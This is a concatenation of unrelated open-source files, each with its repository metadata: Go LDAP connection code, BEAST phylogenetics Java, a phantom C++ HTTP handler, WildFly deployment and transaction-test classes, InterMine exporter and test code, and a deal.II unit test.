if msgCtx, ok := l.messageContexts[message.MessageID]; ok {
delete(l.messageContexts, message.MessageID)
close(msgCtx.responses)
}
}
}
}
}
func (l *Conn) reader() {
cleanstop := false
defer func() {
if err := recover(); err != nil {
log.Printf("ldap: recovered panic in reader: %v", err)
}
if !cleanstop {
l.Close()
}
}()
bufConn := bufio.NewReader(l.conn)
for {
if cleanstop {
l.Debug.Printf("reader clean stopping (without closing the connection)")
return
}
packet, err := ber.ReadPacket(bufConn)
if err != nil {
// A read error is expected here if we are closing the connection...
if !l.IsClosing() {
l.closeErr.Store(fmt.Errorf("unable to read LDAP response packet: %s", err))
l.Debug.Printf("reader error: %s", err)
}
return
}
if err := addLDAPDescriptions(packet); err != nil {
l.Debug.Printf("descriptions error: %s", err)
}
if len(packet.Children) == 0 {
l.Debug.Printf("Received bad ldap packet")
continue
}
l.messageMutex.Lock()
if l.isStartingTLS {
cleanstop = true
}
l.messageMutex.Unlock()
message := &messagePacket{
Op: MessageResponse,
MessageID: packet.Children[0].Value.(int64),
Packet: packet,
}
if !l.sendProcessMessage(message) {
return
}
}
}
| documize/community | vendor/github.com/go-ldap/ldap/v3/conn.go | GO | agpl-3.0 | 15,784 |
/*
* SpeciesBindings.java
*
* Copyright (c) 2002-2015 Alexei Drummond, Andrew Rambaut and Marc Suchard
*
* This file is part of BEAST.
* See the NOTICE file distributed with this work for additional
* information regarding copyright ownership and licensing.
*
* BEAST is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* BEAST is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with BEAST; if not, write to the
* Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
* Boston, MA 02110-1301 USA
*/
package dr.evomodel.speciation;
import dr.evolution.tree.MutableTree;
import dr.evolution.tree.NodeRef;
import dr.evolution.tree.Tree;
import dr.evolution.util.Taxon;
import dr.evomodel.tree.TreeModel;
import dr.inference.model.*;
import dr.util.HeapSort;
import jebl.util.FixedBitSet;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
/**
* Binds taxa in gene trees with species information.
*
* @author Joseph Heled
* Date: 25/05/2008
*/
public class SpeciesBindings extends AbstractModel {
// all gene trees
private final GeneTreeInfo[] geneTrees;
// convenience
private final Map<Taxon, Integer> taxon2Species = new HashMap<Taxon, Integer>();
// Species definition
final SPinfo[] species;
private final double[][] popTimesPair;
private boolean dirty_pp;
private final double[][] popTimesSingle;
private boolean dirty_sg;
private final boolean verbose = false;
public SpeciesBindings(SPinfo[] species, TreeModel[] geneTrees, double[] popFactors) {
super(null);
this.species = species;
final int nsp = species.length;
for (int ns = 0; ns < nsp; ++ns) {
for (Taxon t : species[ns].taxa) {
if (taxon2Species.containsKey(t)) {
throw new Error("Multiple assignments for taxon" + t);
}
taxon2Species.put(t, ns);
}
}
this.geneTrees = new GeneTreeInfo[geneTrees.length];
for (int i = 0; i < geneTrees.length; i++) {
final TreeModel t = geneTrees[i];
addModel(t);
this.geneTrees[i] = new GeneTreeInfo(t, popFactors[i]);
}
for (GeneTreeInfo gt : this.geneTrees) {
for (int ns = 0; ns < nsp; ++ns) {
if (gt.nLineages(ns) == 0) {
throw new Error("Every gene tree must contain at least one tip from each species ("
+ gt.tree.getId() + "," + species[ns].name + ")");
}
}
}
popTimesSingle = new double[nsp][];
for (int ns = 0; ns < popTimesSingle.length; ++ns) {
popTimesSingle[ns] = new double[allCoalPointsCount(ns)];
}
dirty_sg = true;
popTimesPair = new double[(nsp * (nsp - 1)) / 2][];
{
final int nps = allPairCoalPointsCount();
for (int ns = 0; ns < popTimesPair.length; ++ns) {
popTimesPair[ns] = new double[nps];
}
}
dirty_pp = true;
addStatistic(new SpeciesLimits());
}
public int nSpecies() {
return species.length;
}
/**
* Per species coalecent times.
* <p/>
* Indexed by sp index, a list of coalescent times of taxa of this sp from all gene trees.
*
* @return Per species coalecent times
*/
public double[][] getPopTimesSingle() {
if (dirty_sg) {
for (int ns = 0; ns < popTimesSingle.length; ++ns) {
getAllCoalPoints(ns, popTimesSingle[ns]);
}
dirty_sg = false;
}
return popTimesSingle;
}
public double[][] getPopTimesPair() {
if (dirty_pp) {
final int nsp = nSpecies();
for (int ns1 = 0; ns1 < nsp - 1; ++ns1) {
final int z = (ns1 * (2 * nsp - ns1 - 3)) / 2 - 1;
for (int ns2 = ns1 + 1; ns2 < nsp; ++ns2) {
getAllPairCoalPoints(ns1, ns2, popTimesPair[z + ns2]);
}
}
}
return popTimesPair;
}
private void getAllPairCoalPoints(int ns1, int ns2, double[] popTimes) {
for (int i = 0; i < geneTrees.length; i++) {
for (CoalInfo ci : geneTrees[i].getCoalInfo()) {
if ((ci.sinfo[0].contains(ns1) && ci.sinfo[1].contains(ns2)) ||
(ci.sinfo[1].contains(ns1) && ci.sinfo[0].contains(ns2))) {
popTimes[i] = ci.ctime;
break;
}
}
}
HeapSort.sort(popTimes);
}
private int allCoalPointsCount(int spIndex) {
int tot = 0;
for (GeneTreeInfo t : geneTrees) {
if (t.nLineages(spIndex) > 0) {
tot += t.nLineages(spIndex) - 1;
}
}
return tot;
}
// length of points must be right
void getAllCoalPoints(int spIndex, double[] points) {
int k = 0;
for (GeneTreeInfo t : geneTrees) {
final int totCoalEvents = t.nLineages(spIndex) - 1;
int savek = k;
for (CoalInfo ci : t.getCoalInfo()) {
// if( ci == null ) {
// assert ci != null;
// }
if (ci.allHas(spIndex)) {
points[k] = ci.ctime;
++k;
}
}
if (!(totCoalEvents >= 0 && savek + totCoalEvents == k) || (totCoalEvents < 0 && savek == k)) {
System.err.println(totCoalEvents);
}
assert (totCoalEvents >= 0 && savek + totCoalEvents == k) || (totCoalEvents < 0 && savek == k);
}
assert k == points.length;
HeapSort.sort(points);
}
private int allPairCoalPointsCount() {
return geneTrees.length;
}
public double speciationUpperBound(FixedBitSet sub1, FixedBitSet sub2) {
//Determined by the last time any pair of sp's in sub1 x sub2 have been seen
// together in any of the gene trees."""
double bound = Double.MAX_VALUE;
for (GeneTreeInfo g : getGeneTrees()) {
for (CoalInfo ci : g.getCoalInfo()) {
// if past time of current bound, can't change it anymore
if (ci.ctime >= bound) {
break;
}
if ((ci.sinfo[0].intersectCardinality(sub1) > 0 && ci.sinfo[1].intersectCardinality(sub2) > 0)
||
(ci.sinfo[0].intersectCardinality(sub2) > 0 && ci.sinfo[1].intersectCardinality(sub1) > 0)) {
bound = ci.ctime;
break;
}
}
}
return bound;
}
public void makeCompatible(double rootHeight) {
for( GeneTreeInfo t : getGeneTrees() ) {
MutableTree tree = t.tree;
for (int i = 0; i < tree.getExternalNodeCount(); i++) {
final NodeRef node = tree.getExternalNode(i);
final NodeRef p = tree.getParent(node);
tree.setNodeHeight(p, rootHeight + tree.getNodeHeight(p));
}
MutableTree.Utils.correctHeightsForTips(tree);
// (todo) ugly re-init - can I do something better?
t.wasChanged();
t.getCoalInfo();
t.wasBacked = false;
//t.wasChanged();
}
}
/**
* Information on one species (sp)
*/
public static class SPinfo extends Taxon {
// sp name
final public String name;
// all taxa belonging to sp
private final Taxon[] taxa;
public SPinfo(String name, Taxon[] taxa) {
super(name);
this.name = name;
this.taxa = taxa;
}
}
class CoalInfo implements Comparable<CoalInfo> {
// zero based, 0 is taxa time, i.e. in tree branch units
final double ctime;
// sp info for each subtree
final FixedBitSet[] sinfo;
CoalInfo(double t, int nc) {
ctime = t;
sinfo = new FixedBitSet[nc];
}
public int compareTo(CoalInfo o) {
return o.ctime < ctime ? +1 : (o.ctime > ctime ? -1 : 0);
}
/**
* @param s
* @return true if all children have at least one taxa from sp 's'
*/
public boolean allHas(int s) {
for (FixedBitSet b : sinfo) {
if (!b.contains(s)) {
return false;
}
}
return true;
}
}
/**
* Collect coalescence information for sub-tree rooted at 'node'.
*
* @param tree
* @param node
* @param loc Place node data in loc, sub-tree info before that.
* @param info array to fill
* @return location of next available location
*/
private int collectCoalInfo(Tree tree, NodeRef node, int loc, CoalInfo[] info) {
info[loc] = new CoalInfo(tree.getNodeHeight(node), tree.getChildCount(node));
int newLoc = loc - 1;
for (int i = 0; i < 2; i++) {
NodeRef child = tree.getChild(node, i);
info[loc].sinfo[i] = new FixedBitSet(nSpecies());
if (tree.isExternal(child)) {
info[loc].sinfo[i].set(taxon2Species.get(tree.getNodeTaxon(child)));
assert tree.getNodeHeight(child) == 0;
} else {
final int used = collectCoalInfo(tree, child, newLoc, info);
for (int j = 0; j < info[newLoc].sinfo.length; ++j) {
info[loc].sinfo[i].union(info[newLoc].sinfo[j]);
}
newLoc = used;
}
}
return newLoc;
}
public class GeneTreeInfo {
public final TreeModel tree;
private final int[] lineagesCount;
private CoalInfo[] cList;
private CoalInfo[] savedcList;
private boolean dirty;
private boolean wasBacked;
private final double popFactor;
GeneTreeInfo(TreeModel tree, double popFactor) {
this.tree = tree;
this.popFactor = popFactor;
lineagesCount = new int[species.length];
Arrays.fill(lineagesCount, 0);
for (int nl = 0; nl < lineagesCount.length; ++nl) {
for (Taxon t : species[nl].taxa) {
if (tree.getTaxonIndex(t) >= 0) {
++lineagesCount[nl];
}
}
}
cList = new CoalInfo[tree.getExternalNodeCount() - 1];
savedcList = new CoalInfo[cList.length];
wasChanged();
getCoalInfo();
wasBacked = false;
}
int nLineages(int speciesIndex) {
return lineagesCount[speciesIndex];
}
public CoalInfo[] getCoalInfo() {
if (dirty) {
swap();
collectCoalInfo(tree, tree.getRoot(), cList.length - 1, cList);
HeapSort.sort(cList);
dirty = false;
wasBacked = true;
}
return cList;
}
private void swap() {
CoalInfo[] tmp = cList;
cList = savedcList;
savedcList = tmp;
}
void wasChanged() {
dirty = true;
wasBacked = false;
}
boolean restore() {
if (verbose) System.out.println(" SP binding: restore " + tree.getId() + " (" + wasBacked + ")");
if (wasBacked) {
// if( false ) {
// swap();
// dirty = true;
// getCoalInfo();
// for(int k = 0; k < cList.length; ++k) {
// assert cList[k].ctime == savedcList[k].ctime &&
// cList[k].sinfo[0].equals(savedcList[k].sinfo[0]) &&
// cList[k].sinfo[1].equals(savedcList[k].sinfo[1]);
// }
// }
swap();
wasBacked = false;
dirty = false;
return true;
}
return false;
}
void accept() {
if (verbose) System.out.println(" SP binding: accept " + tree.getId());
wasBacked = false;
}
public double popFactor() {
return popFactor;
}
}
public GeneTreeInfo[] getGeneTrees() {
return geneTrees;
}
protected void handleModelChangedEvent(Model model, Object object, int index) {
if (verbose) System.out.println(" SP binding: model changed " + model.getId());
dirty_sg = true;
dirty_pp = true;
for (GeneTreeInfo g : geneTrees) {
if (g.tree == model) {
g.wasChanged();
break;
}
}
fireModelChanged(object, index);
}
protected final void handleVariableChangedEvent(Variable variable, int index, Parameter.ChangeType type) {
assert false;
}
protected void storeState() {
// do on a per need basis
}
protected void restoreState() {
for (GeneTreeInfo g : geneTrees) {
if (g.restore()) {
dirty_sg = true;
dirty_pp = true;
}
}
}
protected void acceptState() {
for (GeneTreeInfo g : geneTrees) {
g.accept();
}
}
public class SpeciesLimits extends Statistic.Abstract {
int nDim;
int c[][];
SpeciesLimits() {
super("SpeciationBounds");
nDim = 0;
final int nsp = species.length;
c = new int[nsp + 1][nsp + 1];
for(int k = 0; k < nsp + 1; ++k) {
c[k][0] = 1;
c[k][k] = 1;
}
for(int k = 0; k < nsp + 1; ++k) {
for(int j = 1; j < k; ++j) {
c[k][j] = c[k - 1][j - 1] + c[k - 1][j];
}
}
for(int k = 0; k <= (int) (nsp / 2); ++k) {
nDim += c[nsp][k];
}
}
public int getDimension() {
return nDim;
}
private double boundOnRoot() {
double bound = Double.MAX_VALUE;
final int nsp = species.length;
for(GeneTreeInfo g : getGeneTrees()) {
for(CoalInfo ci : g.getCoalInfo()) {
if( ci.sinfo[0].cardinality() == nsp || ci.sinfo[1].cardinality() == nsp ) {
bound = Math.min(bound, ci.ctime);
break;
}
}
}
return bound;
}
public double getStatisticValue(int dim) {
if( dim == 0 ) {
return boundOnRoot();
}
final int nsp = species.length;
int r = 0;
int k;
for(k = 0; k <= (int) (nsp / 2); ++k) {
final int i = c[nsp][k];
if( dim < r + i ) {
break;
}
r += i;
}
// Classic index -> select k of nsp subset
// number of species in set is k
int n = dim - r;
FixedBitSet in = new FixedBitSet(nsp),
out = new FixedBitSet(nsp);
int fr = nsp;
for(int i = 0; i < nsp; ++i) {
if( k == 0 ) {
out.set(i);
} else {
if( n < c[fr - 1][k - 1] ) {
in.set(i);
k -= 1;
} else {
out.set(i);
n -= c[fr - 1][k];
}
fr -= 1;
}
}
return speciationUpperBound(in, out);
}
}
} | 4ment/beast-mcmc | src/dr/evomodel/speciation/SpeciesBindings.java | Java | lgpl-2.1 | 16,522 |
// This file is part of the phantom::io_stream::proto_http module.
// Copyright (C) 2006-2014, Eugene Mamchits <mamchits@yandex-team.ru>.
// Copyright (C) 2006-2014, YANDEX LLC.
// This module may be distributed under the terms of the GNU LGPL 2.1.
// See the file ‘COPYING’ or ‘http://www.gnu.org/licenses/lgpl-2.1.html’.
#include "handler.H"
#include "../../scheduler.H"
namespace phantom { namespace io_stream { namespace proto_http {
namespace handler {
config_binding_sname(handler_t);
config_binding_type(handler_t, verify_t);
config_binding_value(handler_t, verify);
config_binding_value(handler_t, scheduler);
config_binding_value(handler_t, switch_prio);
}
void handler_t::proc(request_t const &request, reply_t &reply) const {
if(verify)
verify->proc(request);
if(scheduler) {
if(!scheduler->switch_to(switch_prio))
throw http::exception_t(http::code_503, "Can't switch");
}
do_proc(request, reply);
}
}}} // namespace phantom::io_stream::proto_http
| HolodovAlexander/phantom | phantom/io_stream/proto_http/handler.C | C++ | lgpl-2.1 | 987 |
/*
* JBoss, Home of Professional Open Source.
* Copyright 2020, Red Hat, Inc., and individual contributors
* as indicated by the @author tags. See the copyright.txt file in the
* distribution for a full listing of individual contributors.
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this software; if not, write to the Free
* Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA, or see the FSF site: http://www.fsf.org.
*/
package org.wildfly.clustering.marshalling.spi.util;
import java.util.Set;
import java.util.function.Function;
import java.util.function.IntFunction;
import java.util.function.IntUnaryOperator;
/**
* Externalizer for hash table based sets constructed with a capacity rather than a size.
* @author Paul Ferraro
*/
public class HashSetExternalizer<T extends Set<Object>> extends BoundedCollectionExternalizer<T> {
public static final float DEFAULT_LOAD_FACTOR = 0.75f;
static final IntUnaryOperator CAPACITY = new IntUnaryOperator() {
@Override
public int applyAsInt(int size) {
// Generate a suitable capacity for a given initial size
return size * 2;
}
};
public HashSetExternalizer(Class<T> targetClass, IntFunction<T> factory) {
super(targetClass, new CapacityFactory<>(factory));
}
/**
* Creates a hash table based map or collection with an appropriate capacity given an initial size.
* @param <T> the map or collection type.
*/
public static class CapacityFactory<T> implements Function<Integer, T>, IntFunction<T> {
private final IntFunction<T> factory;
public CapacityFactory(IntFunction<T> factory) {
this.factory = factory;
}
@Override
public T apply(Integer size) {
return this.apply(size.intValue());
}
@Override
public T apply(int size) {
return this.factory.apply(CAPACITY.applyAsInt(size));
}
}
}
| jstourac/wildfly | clustering/marshalling/spi/src/main/java/org/wildfly/clustering/marshalling/spi/util/HashSetExternalizer.java | Java | lgpl-2.1 | 2,555 |
/*
* JBoss, Home of Professional Open Source.
* Copyright 2010, Red Hat, Inc., and individual contributors
* as indicated by the @author tags. See the copyright.txt file in the
* distribution for a full listing of individual contributors.
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this software; if not, write to the Free
* Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA, or see the FSF site: http://www.fsf.org.
*/
package org.jboss.as.connector.deployers.ra.processors;
import static org.jboss.as.connector.logging.ConnectorLogger.ROOT_LOGGER;
import static org.jboss.as.server.deployment.Attachments.CAPABILITY_SERVICE_SUPPORT;
import org.jboss.as.connector.metadata.xmldescriptors.ConnectorXmlDescriptor;
import org.jboss.as.connector.services.resourceadapters.deployment.InactiveResourceAdapterDeploymentService;
import org.jboss.as.connector.subsystems.resourceadapters.ResourceAdaptersService;
import org.jboss.as.connector.util.ConnectorServices;
import org.jboss.as.connector.util.RaServicesFactory;
import org.jboss.as.controller.PathAddress;
import org.jboss.as.controller.PathElement;
import org.jboss.as.controller.capability.CapabilityServiceSupport;
import org.jboss.as.controller.registry.ManagementResourceRegistration;
import org.jboss.as.controller.registry.Resource;
import org.jboss.as.server.deployment.Attachments;
import org.jboss.as.server.deployment.DeploymentModelUtils;
import org.jboss.as.server.deployment.DeploymentPhaseContext;
import org.jboss.as.server.deployment.DeploymentUnit;
import org.jboss.as.server.deployment.DeploymentUnitProcessingException;
import org.jboss.as.server.deployment.DeploymentUnitProcessor;
import org.jboss.jca.common.api.metadata.resourceadapter.Activation;
import org.jboss.modules.Module;
import org.jboss.msc.service.ServiceBuilder;
import org.jboss.msc.service.ServiceController;
import org.jboss.msc.service.ServiceController.Mode;
import org.jboss.msc.service.ServiceName;
import org.jboss.msc.service.ServiceTarget;
/**
* DeploymentUnitProcessor responsible for using IronJacamar metadata and create
* service for ResourceAdapter.
*
* @author <a href="mailto:stefano.maestri@redhat.comdhat.com">Stefano
* Maestri</a>
* @author <a href="jesper.pedersen@jboss.org">Jesper Pedersen</a>
*/
public class RaXmlDeploymentProcessor implements DeploymentUnitProcessor {
public RaXmlDeploymentProcessor() {
}
/**
* Process a deployment for a Connector. Will install a {@Code
* JBossService} for this ResourceAdapter.
*
* @param phaseContext the deployment unit context
* @throws DeploymentUnitProcessingException
*/
public void deploy(DeploymentPhaseContext phaseContext) throws DeploymentUnitProcessingException {
final DeploymentUnit deploymentUnit = phaseContext.getDeploymentUnit();
final ManagementResourceRegistration baseRegistration = deploymentUnit.getAttachment(DeploymentModelUtils.MUTABLE_REGISTRATION_ATTACHMENT);
final ManagementResourceRegistration registration;
final Resource deploymentResource = deploymentUnit.getAttachment(DeploymentModelUtils.DEPLOYMENT_RESOURCE);
final ConnectorXmlDescriptor connectorXmlDescriptor = deploymentUnit.getAttachment(ConnectorXmlDescriptor.ATTACHMENT_KEY);
final CapabilityServiceSupport support = deploymentUnit.getAttachment(CAPABILITY_SERVICE_SUPPORT);
if (connectorXmlDescriptor == null) {
return; // Skip non ra deployments
}
if (deploymentUnit.getParent() != null) {
registration = baseRegistration.getSubModel(PathAddress.pathAddress(PathElement.pathElement("subdeployment")));
} else {
registration = baseRegistration;
}
ResourceAdaptersService.ModifiableResourceAdaptors raxmls = null;
final ServiceController<?> raService = phaseContext.getServiceRegistry().getService(
ConnectorServices.RESOURCEADAPTERS_SERVICE);
if (raService != null)
raxmls = ((ResourceAdaptersService.ModifiableResourceAdaptors) raService.getValue());
ROOT_LOGGER.tracef("processing Raxml");
Module module = deploymentUnit.getAttachment(Attachments.MODULE);
try {
final ServiceTarget serviceTarget = phaseContext.getServiceTarget();
String deploymentUnitPrefix = "";
if (deploymentUnit.getParent() != null) {
deploymentUnitPrefix = deploymentUnit.getParent().getName() + "#";
}
final String deploymentUnitName = deploymentUnitPrefix + deploymentUnit.getName();
if (raxmls != null) {
for (Activation raxml : raxmls.getActivations()) {
String rarName = raxml.getArchive();
if (deploymentUnitName.equals(rarName)) {
RaServicesFactory.createDeploymentService(registration, connectorXmlDescriptor, module, serviceTarget, deploymentUnitName, deploymentUnit.getServiceName(), deploymentUnitName, raxml, deploymentResource, phaseContext.getServiceRegistry(), support);
}
}
}
//create service pointing to rar for other future activations
ServiceName serviceName = ConnectorServices.INACTIVE_RESOURCE_ADAPTER_SERVICE.append(deploymentUnitName);
InactiveResourceAdapterDeploymentService service = new InactiveResourceAdapterDeploymentService(connectorXmlDescriptor, module, deploymentUnitName, deploymentUnitName, deploymentUnit.getServiceName(), registration, serviceTarget, deploymentResource);
ServiceBuilder builder = serviceTarget
.addService(serviceName, service);
builder.setInitialMode(Mode.ACTIVE).install();
} catch (Throwable t) {
throw new DeploymentUnitProcessingException(t);
}
}
}
| jstourac/wildfly | connector/src/main/java/org/jboss/as/connector/deployers/ra/processors/RaXmlDeploymentProcessor.java | Java | lgpl-2.1 | 6,491 |
package org.intermine.model.testmodel.web;
/*
* Copyright (C) 2002-2016 FlyMine
*
* This code may be freely distributed and modified under the
* terms of the GNU Lesser General Public Licence. This should
* be distributed with the code. See the LICENSE file for more
* information or http://www.gnu.org/copyleft/lesser.html.
*
*/
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
import javax.servlet.http.HttpServletResponse;
import org.intermine.model.InterMineObject;
import org.intermine.objectstore.ObjectStore;
import org.intermine.web.logic.export.ExportException;
import org.intermine.web.logic.export.FieldExporter;
/**
* CommaFieldExporter class
*
* @author Kim Rutherford
*/
public class CommaFieldExporter implements FieldExporter
{
/**
* Example FieldExporter that splits the a String field at the first comma and outputs each bit
* on a new line.
* @param o the object of interest
* @param fieldName the field of the object
* @param os the ObjectStore that contains the object
* @param response The HTTP response we are creating - used to get the OutputStream to write to
* @throws ExportException if the application business logic throws an exception
*/
public void exportField(InterMineObject o, String fieldName,
@SuppressWarnings("unused") ObjectStore os,
HttpServletResponse response) throws ExportException {
try {
response.setContentType("text/plain");
response.setHeader("Content-Disposition ", "inline; filename=" + fieldName + ".txt");
OutputStream outputStream = response.getOutputStream();
PrintStream printStream = new PrintStream(outputStream);
String fieldValue = (String) o.getFieldValue(fieldName);
int commaPos = fieldValue.indexOf(",");
String firstPart = fieldValue.substring(0, commaPos + 1);
String secondPart = fieldValue.substring(commaPos + 1).trim();
printStream.println(firstPart);
printStream.println(secondPart);
printStream.close();
outputStream.close();
} catch (IllegalAccessException e) {
throw new ExportException("unexpected IO error while exporting", e);
} catch (IOException e) {
throw new ExportException("unexpected IO error while exporting", e);
}
}
}
| zebrafishmine/intermine | testmodel/webapp/main/src/org/intermine/model/testmodel/web/CommaFieldExporter.java | Java | lgpl-2.1 | 2,444 |
/*
* JBoss, Home of Professional Open Source.
* Copyright 2016, Red Hat, Inc., and individual contributors
* as indicated by the @author tags. See the copyright.txt file in the
* distribution for a full listing of individual contributors.
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* This software is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this software; if not, write to the Free
* Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA, or see the FSF site: http://www.fsf.org.
*/
package org.jboss.as.test.xts.suspend.wsat;
import com.arjuna.wst.Prepared;
import com.arjuna.wst.SystemException;
import com.arjuna.wst.Volatile2PCParticipant;
import com.arjuna.wst.Vote;
import com.arjuna.wst.WrongStateException;
import org.jboss.logging.Logger;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
/**
* @author <a href="mailto:gytis@redhat.com">Gytis Trikleris</a>
*/
public class TransactionParticipant implements Volatile2PCParticipant {
private static final Logger LOGGER = Logger.getLogger(TransactionParticipant.class);
private static final List<String> INVOCATIONS = new ArrayList<>();
private final String id;
public TransactionParticipant(String id) {
this.id = id;
}
public static void resetInvocations() {
LOGGER.infof("resetting invocations %s", INVOCATIONS);
INVOCATIONS.clear();
}
public static List<String> getInvocations() {
LOGGER.infof("returning invocations %s", INVOCATIONS);
return Collections.unmodifiableList(INVOCATIONS);
}
public String getId() {
return id;
}
@Override
public Vote prepare() throws WrongStateException, SystemException {
INVOCATIONS.add("prepare");
LOGGER.infof("preparing call on %s", this);
return new Prepared();
}
@Override
public void commit() throws WrongStateException, SystemException {
INVOCATIONS.add("commit");
LOGGER.infof("commit call on %s", this);
}
@Override
public void rollback() throws WrongStateException, SystemException {
INVOCATIONS.add("rollback");
LOGGER.infof("rollback call on %s", this);
}
@Override
public void unknown() throws SystemException {
INVOCATIONS.add("unknown");
LOGGER.infof("unknown call on %s", this);
}
@Override
public void error() throws SystemException {
INVOCATIONS.add("error");
LOGGER.infof("error call on %s", this);
}
@Override
public String toString() {
return String.format("%s{id='%s', INVOCATIONS=%s}", this.getClass().getSimpleName(), id, INVOCATIONS);
}
}
| xasx/wildfly | testsuite/integration/xts/src/test/java/org/jboss/as/test/xts/suspend/wsat/TransactionParticipant.java | Java | lgpl-2.1 | 3,206 |
// ---------------------------------------------------------------------
//
// Copyright (C) 2012 - 2015 by the deal.II authors
//
// This file is part of the deal.II library.
//
// The deal.II library is free software; you can use it, redistribute
// it, and/or modify it under the terms of the GNU Lesser General
// Public License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// The full text of the license can be found in the file LICENSE at
// the top level of the deal.II distribution.
//
// ---------------------------------------------------------------------
// tests for the BlockMask class
//
// here: test BlockMask::size()
#include "../tests.h"
#include <deal.II/fe/block_mask.h>
void test ()
{
AssertThrow (BlockMask(12, false).size() == 12, ExcInternalError());
AssertThrow (BlockMask().size() == 0, ExcInternalError());
deallog << "OK" << std::endl;
}
int main()
{
std::ofstream logfile ("output");
deallog << std::setprecision (4);
deallog.attach(logfile);
test();
}
| kalj/dealii | tests/fe/block_mask_04.cc | C++ | lgpl-2.1 | 1,091 |
package org.intermine.bio.postprocess;
/*
* Copyright (C) 2002-2016 FlyMine
*
* This code may be freely distributed and modified under the
* terms of the GNU Lesser General Public Licence. This should
* be distributed with the code. See the LICENSE file for more
* information or http://www.gnu.org/copyleft/lesser.html.
*
*/
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Set;
import junit.framework.TestCase;
import org.apache.commons.collections.IteratorUtils;
import org.intermine.model.InterMineObject;
import org.intermine.model.bio.BioEntity;
import org.intermine.model.bio.Chromosome;
import org.intermine.model.bio.DataSource;
import org.intermine.model.bio.Gene;
import org.intermine.model.bio.IntergenicRegion;
import org.intermine.model.bio.Location;
import org.intermine.model.bio.Organism;
import org.intermine.objectstore.ObjectStore;
import org.intermine.objectstore.ObjectStoreException;
import org.intermine.objectstore.ObjectStoreWriter;
import org.intermine.objectstore.ObjectStoreWriterFactory;
import org.intermine.objectstore.query.Query;
import org.intermine.objectstore.query.QueryClass;
import org.intermine.objectstore.query.SingletonResults;
import org.intermine.util.DynamicUtil;
import org.intermine.metadata.Util;
/**
* Tests for the IntergenicRegionUtil class.
* @author Kim Rutherford
*/
public class IntergenicRegionsTest extends TestCase
{
private ObjectStoreWriter osw;
private Organism organism = null;
private DataSource dataSource;
public IntergenicRegionsTest(String arg) {
super(arg);
organism = (Organism) DynamicUtil.createObject(Collections.singleton(Organism.class));
dataSource = (DataSource) DynamicUtil.createObject(Collections.singleton(DataSource.class));
dataSource.setName("FlyMine");
}
public void setUp() throws Exception {
osw = ObjectStoreWriterFactory.getObjectStoreWriter("osw.bio-test");
osw.getObjectStore().flushObjectById();
osw.store(organism);
osw.store(dataSource);
}
public void tearDown() throws Exception {
if (osw.isInTransaction()) {
osw.abortTransaction();
}
Query q = new Query();
QueryClass qc = new QueryClass(InterMineObject.class);
q.addFrom(qc);
q.addToSelect(qc);
SingletonResults res = osw.getObjectStore().executeSingleton(q);
Iterator resIter = res.iterator();
osw.beginTransaction();
while (resIter.hasNext()) {
InterMineObject o = (InterMineObject) resIter.next();
osw.delete(o);
}
osw.commitTransaction();
osw.close();
}
public void testCreateIntergenicRegionFeatures() throws Exception {
IntergenicRegionUtil iru = new IntergenicRegionUtil(osw);
List chrXgeneLocList = new ArrayList();
Map chrXlocMap = new HashMap();
Integer chrXId = createChrX(chrXgeneLocList, chrXlocMap, 1000);
Iterator irIter = iru.createIntergenicRegionFeatures(new HashSet(chrXgeneLocList),
chrXlocMap, chrXId);
{
Set intergenicRegions = new HashSet(IteratorUtils.toList(irIter));
assertEquals(5, intergenicRegions.size());
}
List chr1geneLocList = new ArrayList();
Map chr1locMap = new HashMap();
Integer chr1Id = createChr1(chr1geneLocList, chr1locMap, 2000);
irIter = iru.createIntergenicRegionFeatures(new HashSet(chr1geneLocList), chr1locMap,
chr1Id);
{
Set intergenicRegions = new HashSet(IteratorUtils.toList(irIter));
assertEquals(3, intergenicRegions.size());
}
}
public void testCreateIntergenicRegionFeaturesRefs() throws Exception {
IntergenicRegionUtil iru = new IntergenicRegionUtil(osw);
List chrXgeneLocList = new ArrayList();
Map chrXlocMap = new HashMap();
createChrX(chrXgeneLocList, chrXlocMap, 3000);
List chr1geneLocList = new ArrayList();
Map chr1locMap = new HashMap();
Integer chr1Id = createChr1(chr1geneLocList, chr1locMap, 4000);
iru.createIntergenicRegionFeatures();
ObjectStore os = osw.getObjectStore();
os.flushObjectById();
Query q = new Query();
